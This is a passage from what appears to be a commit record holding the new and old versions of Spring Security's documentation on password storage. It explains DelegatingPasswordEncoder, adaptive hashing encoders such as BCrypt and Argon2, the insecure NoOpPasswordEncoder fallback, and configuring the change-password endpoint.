<3>\n{scrypt}$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc\/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu\/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc= \/\/ <4>\n{sha256}97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0 \/\/ <5>\n----\n====\n\n<1> The first password would have a `PasswordEncoder` id of `bcrypt` and an encodedPassword of `$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG`.\nWhen matching, it would delegate to `BCryptPasswordEncoder`.\n<2> The second password would have a `PasswordEncoder` id of `noop` and an encodedPassword of `password`.\nWhen matching, it would delegate to `NoOpPasswordEncoder`.\n<3> The third password would have a `PasswordEncoder` id of `pbkdf2` and an encodedPassword of `5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc`.\nWhen matching, it would delegate to `Pbkdf2PasswordEncoder`.\n<4> The fourth password would have a `PasswordEncoder` id of `scrypt` and an encodedPassword of `$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc\/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu\/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc=`.\nWhen matching, it would delegate to `SCryptPasswordEncoder`.\n<5> The final password would have a `PasswordEncoder` id of `sha256` and an encodedPassword of `97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0`.\nWhen matching, it would delegate to `StandardPasswordEncoder`.\n\n[NOTE]\n====\nSome users might be concerned 
that the storage format is provided for a potential hacker.\nThis is not a concern because the storage of the password does not rely on the algorithm being a secret.\nAdditionally, most formats are easy for an attacker to figure out without the prefix.\nFor example, BCrypt passwords often start with `$2a$`.\n====\n\n[[authentication-password-storage-dpe-encoding]]\n=== Password Encoding\n\nThe `idForEncode` passed into the constructor determines which `PasswordEncoder` will be used for encoding passwords.\nIn the `DelegatingPasswordEncoder` we constructed above, that means that the result of encoding `password` would be delegated to `BCryptPasswordEncoder` and be prefixed with `+{bcrypt}+`.\nThe end result would look like:\n\n.DelegatingPasswordEncoder Encode Example\n====\n[source,text,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n====\n\n[[authentication-password-storage-dpe-matching]]\n=== Password Matching\n\nMatching is done based upon the `+{id}+` and the mapping of the `id` to the `PasswordEncoder` provided in the constructor.\nOur example in <<authentication-password-storage-dpe-format,Password Storage Format>> provides a working example of how this is done.\nBy default, the result of invoking `matches(CharSequence, String)` with a password and an `id` that is not mapped (including a null id) will result in an `IllegalArgumentException`.\nThis behavior can be customized using `DelegatingPasswordEncoder.setDefaultPasswordEncoderForMatches(PasswordEncoder)`.\n\nBy using the `id` we can match on any password encoding, but encode passwords using the most modern password encoding.\nThis is important, because unlike encryption, password hashes are designed so that there is no simple way to recover the plaintext.\nSince there is no way to recover the plaintext, it makes it difficult to migrate the passwords.\nWhile it is simple for users to migrate `NoOpPasswordEncoder`, we chose to include it by default to make it simple for the getting started experience.\n\n[[authentication-password-storage-dep-getting-started]]\n=== Getting Started Experience\n\nIf you are putting together a demo or a sample, it is a bit cumbersome to take time to hash the passwords of your users.\nThere are convenience mechanisms to make this easier, but this is still not intended for production.\n\n.withDefaultPasswordEncoder Example\n====\n.Java\n[source,java,role=\"primary\",attrs=\"-attributes\"]\n----\nUser user = User.withDefaultPasswordEncoder()\n .username(\"user\")\n .password(\"password\")\n .roles(\"user\")\n .build();\nSystem.out.println(user.getPassword());\n\/\/ {bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\",attrs=\"-attributes\"]\n----\nval user = User.withDefaultPasswordEncoder()\n .username(\"user\")\n .password(\"password\")\n .roles(\"user\")\n .build()\nprintln(user.password)\n\/\/ {bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n====\n\nIf you are creating multiple users, you can also reuse the builder.\n\n.withDefaultPasswordEncoder Reusing the Builder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nUserBuilder users = User.withDefaultPasswordEncoder();\nUser user = users\n .username(\"user\")\n .password(\"password\")\n .roles(\"USER\")\n .build();\nUser admin = users\n .username(\"admin\")\n .password(\"password\")\n .roles(\"USER\",\"ADMIN\")\n .build();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval users = 
User.withDefaultPasswordEncoder()\nval user = users\n .username(\"user\")\n .password(\"password\")\n .roles(\"USER\")\n .build()\nval admin = users\n .username(\"admin\")\n .password(\"password\")\n .roles(\"USER\", \"ADMIN\")\n .build()\n----\n====\n\nThis does hash the password that is stored, but the passwords are still exposed in memory and in the compiled source code.\nTherefore, it is still not considered secure for a production environment.\nFor production, you should <<authentication-password-storage-boot-cli,hash your passwords externally>>.\n\n[[authentication-password-storage-boot-cli]]\n=== Encode with Spring Boot CLI\n\nThe easiest way to properly encode your password is to use the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/spring-boot-cli.html[Spring Boot CLI].\n\nFor example, the following will encode the password of `password` for use with <<authentication-password-storage-dpe>>:\n\n.Spring Boot CLI encodepassword Example\n====\n[source,attrs=\"-attributes\"]\n----\nspring encodepassword password\n{bcrypt}$2a$10$X5wFBtLrL\/kHcmrOGGTrGufsBX8CJ0WpQpF3pgeuxBB\/H73BK1DW6\n----\n====\n\n[[authentication-password-storage-dpe-troubleshoot]]\n=== Troubleshooting\n\nThe following error occurs when one of the stored passwords has no id, as described in <<authentication-password-storage-dpe-format>>.\n\n----\njava.lang.IllegalArgumentException: There is no PasswordEncoder mapped for the id \"null\"\n\tat org.springframework.security.crypto.password.DelegatingPasswordEncoder$UnmappedIdPasswordEncoder.matches(DelegatingPasswordEncoder.java:233)\n\tat org.springframework.security.crypto.password.DelegatingPasswordEncoder.matches(DelegatingPasswordEncoder.java:196)\n----\n\nThe easiest way to resolve the error is to figure out how your passwords are currently being stored and explicitly provide the correct `PasswordEncoder`.\n\nIf you are migrating from Spring Security 4.2.x you can revert to the previous behavior by <<authentication-password-storage-configuration,exposing a `NoOpPasswordEncoder` bean>>.\n\nAlternatively, you can prefix all of your passwords with the correct id and continue to use `DelegatingPasswordEncoder`.\nFor example, if you are using BCrypt, you would migrate your password from something like:\n\n----\n$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\nto\n\n\n[source,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\nFor a complete listing of the mappings refer to the Javadoc on\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/5.0.x\/api\/org\/springframework\/security\/crypto\/factory\/PasswordEncoderFactories.html[PasswordEncoderFactories].\n\n[[authentication-password-storage-bcrypt]]\n== BCryptPasswordEncoder\n\nThe `BCryptPasswordEncoder` implementation uses the widely supported https:\/\/en.wikipedia.org\/wiki\/Bcrypt[bcrypt] algorithm to hash the passwords.\nIn order to make it more resistant to password cracking, bcrypt is deliberately slow.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThe default implementation of `BCryptPasswordEncoder` uses strength 10 as mentioned in the Javadoc of 
https:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/api\/org\/springframework\/security\/crypto\/bcrypt\/BCryptPasswordEncoder.html[BCryptPasswordEncoder]. You are encouraged to\ntune and test the strength parameter on your own system so that it takes roughly 1 second to verify a password.\n\n.BCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with strength 16\nBCryptPasswordEncoder encoder = new BCryptPasswordEncoder(16);\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with strength 16\nval encoder = BCryptPasswordEncoder(16)\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-argon2]]\n== Argon2PasswordEncoder\n\nThe `Argon2PasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/Argon2[Argon2] algorithm to hash the passwords.\nArgon2 is the winner of the https:\/\/en.wikipedia.org\/wiki\/Password_Hashing_Competition[Password Hashing Competition].\nIn order to defeat password cracking on custom hardware, Argon2 is a deliberately slow algorithm that requires large amounts of memory.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThe current implementation of the `Argon2PasswordEncoder` requires BouncyCastle.\n\n.Argon2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nArgon2PasswordEncoder encoder = new Argon2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Argon2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-pbkdf2]]\n== Pbkdf2PasswordEncoder\n\nThe `Pbkdf2PasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/PBKDF2[PBKDF2] algorithm to hash the passwords.\nIn order to defeat password cracking, PBKDF2 is a deliberately slow algorithm.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThis algorithm is a good choice when FIPS certification is required.\n\n.Pbkdf2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nPbkdf2PasswordEncoder encoder = new Pbkdf2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Pbkdf2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-scrypt]]\n== SCryptPasswordEncoder\n\nThe `SCryptPasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/Scrypt[scrypt] algorithm to hash the passwords.\nIn order to defeat password cracking on custom hardware, scrypt is a deliberately slow algorithm that requires large amounts of memory.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your 
system.\n\n.SCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nSCryptPasswordEncoder encoder = new SCryptPasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = SCryptPasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-other]]\n== Other PasswordEncoders\n\nThere are a significant number of other `PasswordEncoder` implementations that exist entirely for backward compatibility.\nThey are all deprecated to indicate that they are no longer considered secure.\nHowever, there are no plans to remove them since it is difficult to migrate existing legacy systems.\n\n[[authentication-password-storage-configuration]]\n== Password Storage Configuration\n\nSpring Security uses <<authentication-password-storage-dpe>> by default.\nHowever, this can be customized by exposing a `PasswordEncoder` as a Spring bean.\n\n\nIf you are migrating from Spring Security 4.2.x you can revert to the previous behavior by exposing a `NoOpPasswordEncoder` bean.\n\n[WARNING]\n====\nReverting to `NoOpPasswordEncoder` is not considered to be secure.\nYou should instead migrate to using `DelegatingPasswordEncoder` to support secure password encoding.\n====\n\n.NoOpPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\npublic static PasswordEncoder passwordEncoder() {\n return NoOpPasswordEncoder.getInstance();\n}\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<b:bean id=\"passwordEncoder\"\n class=\"org.springframework.security.crypto.password.NoOpPasswordEncoder\" factory-method=\"getInstance\"\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@Bean\nfun passwordEncoder(): PasswordEncoder {\n return NoOpPasswordEncoder.getInstance()\n}\n----\n====\n\n[NOTE]\n====\nXML Configuration requires the `NoOpPasswordEncoder` bean name to be `passwordEncoder`.\n====\n\n[[authentication-change-password-configuration]]\n== Change Password Configuration\n\nMost applications that allow a user to specify a password also require a feature for updating that password.\n\nhttps:\/\/w3c.github.io\/webappsec-change-password-url\/[A Well-Known URL for Changing Passwords] indicates a mechanism by which password managers can discover the password update endpoint for a given application.\n\nYou can configure Spring Security to provide this discovery endpoint.\nFor example, if the change password endpoint in your application is `\/change-password`, then you can configure Spring Security like so:\n\n.Default Change Password Endpoint\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .passwordManagement(Customizer.withDefaults())\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<sec:password-management\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nhttp {\n passwordManagement { }\n}\n----\n====\n\nThen, when a password manager navigates to `\/.well-known\/change-password`, Spring Security will redirect to your endpoint, `\/change-password`.\n\nOr, if your endpoint is something other than `\/change-password`, you can also specify that like so:\n\n.Change Password Endpoint\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .passwordManagement((management) -> management\n 
.changePasswordPage(\"\/update-password\")\n )\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<sec:password-management change-password-page=\"\/update-password\"\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nhttp {\n passwordManagement {\n changePasswordPage = \"\/update-password\"\n }\n}\n----\n====\n\nWith the above configuration, when a password manager navigates to `\/.well-known\/change-password`, then Spring Security will redirect to `\/update-password`.\n","old_contents":"[[authentication-password-storage]]\n= Password Storage\n\nSpring Security's `PasswordEncoder` interface is used to perform a one way transformation of a password to allow the password to be stored securely.\nGiven `PasswordEncoder` is a one way transformation, it is not intended when the password transformation needs to be two way (i.e. storing credentials used to authenticate to a database).\nTypically `PasswordEncoder` is used for storing a password that needs to be compared to a user provided password at the time of authentication.\n\n[[authentication-password-storage-history]]\n== Password Storage History\n\nThroughout the years the standard mechanism for storing passwords has evolved.\nIn the beginning passwords were stored in plain text.\nThe passwords were assumed to be safe because the data store the passwords were saved in required credentials to access it.\nHowever, malicious users were able to find ways to get large \"data dumps\" of usernames and passwords using attacks like SQL Injection.\nAs more and more user credentials became public security experts realized we needed to do more to protect users' passwords.\n\nDevelopers were then encouraged to store passwords after running them through a one way hash such as SHA-256.\nWhen a user tried to authenticate, the hashed password would be compared to the hash of the password that they typed.\nThis meant that the system only needed to store the one way hash of the password.\nIf a breach occurred, then only the one way hashes of the passwords were exposed.\nSince the hashes were one way and it was computationally difficult to guess the passwords given the hash, it would not be worth the effort to figure out each password in the system.\nTo defeat this new system malicious users decided to create lookup tables known as https:\/\/en.wikipedia.org\/wiki\/Rainbow_table[Rainbow Tables].\nRather than doing the work of guessing each password every time, they computed the password once and stored it in a lookup table.\n\nTo mitigate the effectiveness of Rainbow Tables, developers were encouraged to use salted passwords.\nInstead of using just the password as input to the hash function, random bytes (known as salt) would be generated for every users' password.\nThe salt and the user's password would be ran through the hash function which produced a unique hash.\nThe salt would be stored alongside the user's password in clear text.\nThen when a user tried to authenticate, the hashed password would be compared to the hash of the stored salt and the password that they typed.\nThe unique salt meant that Rainbow Tables were no longer effective because the hash was different for every salt and password combination.\n\nIn modern times we realize that cryptographic hashes (like SHA-256) are no longer secure.\nThe reason is that with modern hardware we can perform billions of hash calculations a second.\nThis means that we can crack each password individually with ease.\n\nDevelopers are now encouraged to leverage adaptive one-way functions to store 
a password.\nValidation of passwords with adaptive one-way functions are intentionally resource (i.e. CPU, memory, etc) intensive.\nAn adaptive one-way function allows configuring a \"work factor\" which can grow as hardware gets better.\nIt is recommended that the \"work factor\" be tuned to take about 1 second to verify a password on your system.\nThis trade off is to make it difficult for attackers to crack the password, but not so costly it puts excessive burden on your own system.\nSpring Security has attempted to provide a good starting point for the \"work factor\", but users are encouraged to customize the \"work factor\" for their own system since the performance will vary drastically from system to system.\nExamples of adaptive one-way functions that should be used include <<authentication-password-storage-bcrypt,bcrypt>>, <<authentication-password-storage-pbkdf2,PBKDF2>>, <<authentication-password-storage-scrypt,scrypt>>, and <<authentication-password-storage-argon2,argon2>>.\n\nBecause adaptive one-way functions are intentionally resource intensive, validating a username and password for every request will degrade performance of an application significantly.\nThere is nothing Spring Security (or any other library) can do to speed up the validation of the password since security is gained by making the validation resource intensive.\nUsers are encouraged to exchange the long term credentials (i.e. username and password) for a short term credential (i.e. session, OAuth Token, etc).\nThe short term credential can be validated quickly without any loss in security.\n\n\n[[authentication-password-storage-dpe]]\n== DelegatingPasswordEncoder\n\nPrior to Spring Security 5.0 the default `PasswordEncoder` was `NoOpPasswordEncoder` which required plain text passwords.\nBased upon the <<authentication-password-storage-history,Password History>> section you might expect that the default `PasswordEncoder` is now something like `BCryptPasswordEncoder`.\nHowever, this ignores three real world problems:\n\n- There are many applications using old password encodings that cannot easily migrate\n- The best practice for password storage will change again\n- As a framework Spring Security cannot make breaking changes frequently\n\nInstead Spring Security introduces `DelegatingPasswordEncoder` which solves all of the problems by:\n\n- Ensuring that passwords are encoded using the current password storage recommendations\n- Allowing for validating passwords in modern and legacy formats\n- Allowing for upgrading the encoding in the future\n\nYou can easily construct an instance of `DelegatingPasswordEncoder` using `PasswordEncoderFactories`.\n\n.Create Default DelegatingPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nPasswordEncoder passwordEncoder =\n PasswordEncoderFactories.createDelegatingPasswordEncoder();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval passwordEncoder: PasswordEncoder = PasswordEncoderFactories.createDelegatingPasswordEncoder()\n----\n====\n\nAlternatively, you may create your own custom instance. 
For example:\n\n.Create Custom DelegatingPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nString idForEncode = \"bcrypt\";\nMap encoders = new HashMap<>();\nencoders.put(idForEncode, new BCryptPasswordEncoder());\nencoders.put(\"noop\", NoOpPasswordEncoder.getInstance());\nencoders.put(\"pbkdf2\", new Pbkdf2PasswordEncoder());\nencoders.put(\"scrypt\", new SCryptPasswordEncoder());\nencoders.put(\"sha256\", new StandardPasswordEncoder());\n\nPasswordEncoder passwordEncoder =\n new DelegatingPasswordEncoder(idForEncode, encoders);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval idForEncode = \"bcrypt\"\nval encoders: MutableMap<String, PasswordEncoder> = mutableMapOf()\nencoders[idForEncode] = BCryptPasswordEncoder()\nencoders[\"noop\"] = NoOpPasswordEncoder.getInstance()\nencoders[\"pbkdf2\"] = Pbkdf2PasswordEncoder()\nencoders[\"scrypt\"] = SCryptPasswordEncoder()\nencoders[\"sha256\"] = StandardPasswordEncoder()\n\nval passwordEncoder: PasswordEncoder = DelegatingPasswordEncoder(idForEncode, encoders)\n----\n====\n\n[[authentication-password-storage-dpe-format]]\n=== Password Storage Format\n\nThe general format for a password is:\n\n.DelegatingPasswordEncoder Storage Format\n====\n[source,text,attrs=\"-attributes\"]\n----\n{id}encodedPassword\n----\n====\n\nSuch that `id` is an identifier used to look up which `PasswordEncoder` should be used and `encodedPassword` is the original encoded password for the selected `PasswordEncoder`.\nThe `id` must be at the beginning of the password, start with `{` and end with `}`.\nIf the `id` cannot be found, the `id` will be null.\nFor example, the following might be a list of passwords encoded using different `id`.\nAll of the original passwords are \"password\".\n\n.DelegatingPasswordEncoder Encoded Passwords Example\n====\n[source,text,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG \/\/ <1>\n{noop}password \/\/ <2>\n{pbkdf2}5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc \/\/ <3>\n{scrypt}$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc\/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu\/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc= \/\/ <4>\n{sha256}97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0 \/\/ <5>\n----\n====\n\n<1> The first password would have a `PasswordEncoder` id of `bcrypt` and encodedPassword of `$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG`.\nWhen matching it would delegate to `BCryptPasswordEncoder`\n<2> The second password would have a `PasswordEncoder` id of `noop` and encodedPassword of `password`.\nWhen matching it would delegate to `NoOpPasswordEncoder`\n<3> The third password would have a `PasswordEncoder` id of `pbkdf2` and encodedPassword of `5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc`.\nWhen matching it would delegate to `Pbkdf2PasswordEncoder`\n<4> The fourth password would have a `PasswordEncoder` id of `scrypt` and encodedPassword of `$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc\/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu\/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc=`\nWhen matching it would delegate to `SCryptPasswordEncoder`\n<5> The final password would have a `PasswordEncoder` id of `sha256` and encodedPassword of `97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0`.\nWhen matching it would delegate to `StandardPasswordEncoder`\n\n[NOTE]\n====\nSome users might be concerned 
that the storage format is provided for a potential hacker.\nThis is not a concern because the storage of the password does not rely on the algorithm being a secret.\nAdditionally, most formats are easy for an attacker to figure out without the prefix.\nFor example, BCrypt passwords often start with `$2a$`.\n====\n\n[[authentication-password-storage-dpe-encoding]]\n=== Password Encoding\n\nThe `idForEncode` passed into the constructor determines which `PasswordEncoder` will be used for encoding passwords.\nIn the `DelegatingPasswordEncoder` we constructed above, that means that the result of encoding `password` would be delegated to `BCryptPasswordEncoder` and be prefixed with `+{bcrypt}+`.\nThe end result would look like:\n\n.DelegatingPasswordEncoder Encode Example\n====\n[source,text,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n====\n\n[[authentication-password-storage-dpe-matching]]\n=== Password Matching\n\nMatching is done based upon the `+{id}+` and the mapping of the `id` to the `PasswordEncoder` provided in the constructor.\nOur example in <<authentication-password-storage-dpe-format,Password Storage Format>> provides a working example of how this is done.\nBy default, the result of invoking `matches(CharSequence, String)` with a password and an `id` that is not mapped (including a null id) will result in an `IllegalArgumentException`.\nThis behavior can be customized using `DelegatingPasswordEncoder.setDefaultPasswordEncoderForMatches(PasswordEncoder)`.\n\nBy using the `id` we can match on any password encoding, but encode passwords using the most modern password encoding.\nThis is important, because unlike encryption, password hashes are designed so that there is no simple way to recover the plaintext.\nSince there is no way to recover the plaintext, it makes it difficult to migrate the passwords.\nWhile it is simple for users to migrate `NoOpPasswordEncoder`, we chose to include it by default to make it simple for the getting started experience.\n\n[[authentication-password-storage-dep-getting-started]]\n=== Getting Started Experience\n\nIf you are putting together a demo or a sample, it is a bit cumbersome to take time to hash the passwords of your users.\nThere are convenience mechanisms to make this easier, but this is still not intended for production.\n\n.withDefaultPasswordEncoder Example\n====\n.Java\n[source,java,role=\"primary\",attrs=\"-attributes\"]\n----\nUser user = User.withDefaultPasswordEncoder()\n .username(\"user\")\n .password(\"password\")\n .roles(\"user\")\n .build();\nSystem.out.println(user.getPassword());\n\/\/ {bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\",attrs=\"-attributes\"]\n----\nval user = User.withDefaultPasswordEncoder()\n .username(\"user\")\n .password(\"password\")\n .roles(\"user\")\n .build()\nprintln(user.password)\n\/\/ {bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n====\n\nIf you are creating multiple users, you can also reuse the builder.\n\n.withDefaultPasswordEncoder Reusing the Builder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nUserBuilder users = User.withDefaultPasswordEncoder();\nUser user = users\n .username(\"user\")\n .password(\"password\")\n .roles(\"USER\")\n .build();\nUser admin = users\n .username(\"admin\")\n .password(\"password\")\n .roles(\"USER\",\"ADMIN\")\n .build();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval users = 
User.withDefaultPasswordEncoder()\nval user = users\n .username(\"user\")\n .password(\"password\")\n .roles(\"USER\")\n .build()\nval admin = users\n .username(\"admin\")\n .password(\"password\")\n .roles(\"USER\", \"ADMIN\")\n .build()\n----\n====\n\nThis does hash the password that is stored, but the passwords are still exposed in memory and in the compiled source code.\nTherefore, it is still not considered secure for a production environment.\nFor production, you should <<authentication-password-storage-boot-cli,hash your passwords externally>>.\n\n[[authentication-password-storage-boot-cli]]\n=== Encode with Spring Boot CLI\n\nThe easiest way to properly encode your password is to use the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/spring-boot-cli.html[Spring Boot CLI].\n\nFor example, the following will encode the password of `password` for use with <<authentication-password-storage-dpe>>:\n\n.Spring Boot CLI encodepassword Example\n====\n[source,attrs=\"-attributes\"]\n----\nspring encodepassword password\n{bcrypt}$2a$10$X5wFBtLrL\/kHcmrOGGTrGufsBX8CJ0WpQpF3pgeuxBB\/H73BK1DW6\n----\n====\n\n[[authentication-password-storage-dpe-troubleshoot]]\n=== Troubleshooting\n\nThe following error occurs when one of the passwords that are stored has no id as described in <<authentication-password-storage-dpe-format>>.\n\n----\njava.lang.IllegalArgumentException: There is no PasswordEncoder mapped for the id \"null\"\n\tat org.springframework.security.crypto.password.DelegatingPasswordEncoder$UnmappedIdPasswordEncoder.matches(DelegatingPasswordEncoder.java:233)\n\tat org.springframework.security.crypto.password.DelegatingPasswordEncoder.matches(DelegatingPasswordEncoder.java:196)\n----\n\nThe easiest way to resolve the error is to switch to explicitly providing the `PasswordEncoder` that your passwords are encoded with.\nThe easiest way to resolve it is to figure out how your passwords are currently being stored and explicitly provide the correct `PasswordEncoder`.\n\nIf you are migrating from Spring Security 4.2.x you can revert to the previous behavior by <<authentication-password-storage-configuration,exposing a `NoOpPasswordEncoder` bean>>.\n\nAlternatively, you can prefix all of your passwords with the correct id and continue to use `DelegatingPasswordEncoder`.\nFor example, if you are using BCrypt, you would migrate your password from something like:\n\n----\n$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\nto\n\n\n[source,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\nFor a complete listing of the mappings refer to the Javadoc on\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/5.0.x\/api\/org\/springframework\/security\/crypto\/factory\/PasswordEncoderFactories.html[PasswordEncoderFactories].\n\n[[authentication-password-storage-bcrypt]]\n== BCryptPasswordEncoder\n\nThe `BCryptPasswordEncoder` implementation uses the widely supported https:\/\/en.wikipedia.org\/wiki\/Bcrypt[bcrypt] algorithm to hash the passwords.\nIn order to make it more resistent to password cracking, bcrypt is deliberately slow.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThe default implementation of `BCryptPasswordEncoder` uses strength 10 as mentioned in the Javadoc of 
https:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/api\/org\/springframework\/security\/crypto\/bcrypt\/BCryptPasswordEncoder.html[BCryptPasswordEncoder]. You are encouraged to\ntune and test the strength parameter on your own system so that it takes roughly 1 second to verify a password.\n\n.BCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with strength 16\nBCryptPasswordEncoder encoder = new BCryptPasswordEncoder(16);\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with strength 16\nval encoder = BCryptPasswordEncoder(16)\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-argon2]]\n== Argon2PasswordEncoder\n\nThe `Argon2PasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/Argon2[Argon2] algorithm to hash the passwords.\nArgon2 is the winner of the https:\/\/en.wikipedia.org\/wiki\/Password_Hashing_Competition[Password Hashing Competition].\nIn order to defeat password cracking on custom hardware, Argon2 is a deliberately slow algorithm that requires large amounts of memory.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a 